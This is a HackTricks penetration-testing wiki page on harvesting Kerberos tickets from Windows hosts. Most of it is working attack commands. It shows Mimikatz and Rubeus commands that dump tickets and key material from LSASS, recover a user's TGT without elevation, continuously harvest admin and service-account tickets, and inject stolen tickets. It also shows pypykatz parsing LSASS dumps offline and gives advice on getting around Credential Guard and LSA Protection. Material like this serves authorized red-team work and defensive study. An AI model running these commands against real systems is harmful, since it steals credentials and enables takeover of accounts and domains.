harvesting-tickets-from-windows.md (5731B)
1 --- 2 title: "Harvesting tickets from Windows" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Harvesting tickets from Windows 14 15 Tickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. A non-administrative user can usually only access their own logon session, while an administrator (or `SYSTEM`) can enumerate and extract tickets across the host. On modern Windows builds, **LSA Protection** and **Credential Guard** frequently make old "just dump LSASS" tradecraft less reliable, so combine quick native triage, targeted dumping, and offline parsing instead of assuming a single command will always return every ticket.<sup>[[3]](#references)</sup> 16 17 ### Native triage 18 19 Before exporting anything, confirm whether the current session already has useful Kerberos material and whether you need elevation to reach other logon sessions: 20 21 ```batch 22 klist 23 klist tgt 24 klist sessions 25 ``` 26 27 `klist` doesn't export tickets, but it quickly confirms whether the current logon session already has a **TGT**, which **service tickets** are cached, and whether it is worth escalating before touching LSASS.<sup>[[1]](#references)</sup> 28 29 ### Mimikatz 30 31 Mimikatz is still the fastest option when you can read LSASS, and it is also useful against an offline **LSASS minidump**.<sup>[[1]](#references)</sup> 32 33 ```bash 34 # Live LSASS access 35 privilege::debug 36 sekurlsa::tickets /export 37 sekurlsa::ekeys 38 39 # Parse an offline dump instead of reading lsass.exe again 40 sekurlsa::minidump C:\Temp\lsass.dmp 41 sekurlsa::tickets /export 42 ``` 43 44 `sekurlsa::ekeys` is especially useful in modern **AES-first** domains because it returns Kerberos key material you can reuse in [over-pass-the-hash / pass-the-key](/hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key) workflows even when full ticket extraction is inconvenient. 45 46 ### Rubeus 47 48 Rubeus is usually the best first choice because it lets you **triage before dumping** and can work without elevation for some actions.<sup>[[2]](#references)</sup> 49 50 ```bash 51 # Quick recon first: list LUID, username, service and expiry 52 .\Rubeus.exe triage 53 .\Rubeus.exe logonsession 54 55 # Dump only the interesting tickets 56 .\Rubeus.exe dump /service:krbtgt /nowrap 57 .\Rubeus.exe dump /luid:0x3e7 /service:krbtgt /nowrap # SYSTEM / machine-account context 58 .\Rubeus.exe dump /luid:0x3e4 /nowrap # NETWORK SERVICE 59 .\Rubeus.exe dump /luid:0x3e5 /nowrap # LOCAL SERVICE 60 ``` 61 62 As a rule of thumb, **non-elevated** `triage`/`dump` only see the current user's logon session. **Elevated** execution lets you enumerate other users, service logons, and machine-account tickets across the host. 63 64 If you cannot open LSASS but you can execute as the victim user, `tgtdeleg` is the most useful fallback because it abuses the Kerberos delegation/GSS-API flow to recover the **current user's TGT without elevation**: 65 66 ```bash 67 .\Rubeus.exe tgtdeleg /nowrap 68 .\Rubeus.exe tgtdeleg /outfile:user_tgt.kirbi 69 ``` 70 71 For long-lived access on a workstation, Rubeus can also harvest tickets **as they appear** instead of doing one noisy one-shot dump: 72 73 ```bash 74 .\Rubeus.exe monitor /filteruser:*admin* /interval:30 /nowrap 75 .\Rubeus.exe harvest /filteruser:svc_* /outdir:C:\ProgramData\tickets 76 ``` 77 78 If you want to inject a stolen TGT without overwriting your current ticket cache, create a sacrificial logon session first and then use that LUID for `ptt`: 79 80 ```bash 81 .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe 82 .\Rubeus.exe ptt /ticket:C:\Temp\admin.kirbi /luid:0xA1234 83 ``` 84 85 `createnetonly` prints the new LUID when it spawns the sacrificial session; inject into that session to keep your original TGT untouched. Ticket injection/replay and cross-platform conversion are covered in [Pass the Ticket](/hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket). 86 87 ### Parsing LSASS dumps offline 88 89 When EDR or **LSASS-as-PPL** makes repeated live access too noisy, export a **full-memory LSASS dump** once and parse it off-host. `pypykatz` can extract `.kirbi` tickets from that dump directly: 90 91 ```bash 92 pypykatz lsa minidump lsass.dmp -k tickets/ 93 ``` 94 95 ### Modern Windows nuances 96 97 On recent Windows 11 / Server 2025 estates, **LSASS protected process** and **Credential Guard** make old live-LSASS ticket dumping much less predictable. In practice:<sup>[[3]](#references)</sup> 98 99 - expect **TGT extraction** to fail first when Credential Guard is enabled, while **service tickets** may still be present/useful. 100 - target specific **LUIDs** instead of bulk-dumping everything whenever possible. 101 - fall back to `tgtdeleg`, offline minidump parsing, or `sekurlsa::ekeys` when live LSASS access is restricted. 102 - if you need the protection internals and common bypass considerations, read [Windows credentials protections](/hacktricks/windows-hardening/stealing-credentials/credentials-protections). 103 104 ## References 105 106 - [1] [Kerberos (II): How to attack Kerberos?](https://www.tarlogic.com/blog/how-to-attack-kerberos/) 107 - [2] [Rubeus Overview](https://docs.specterops.io/ghostpack-docs/Rubeus-mdx/overview) 108 - [3] [Microsoft Learn — Credential Guard overview](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/)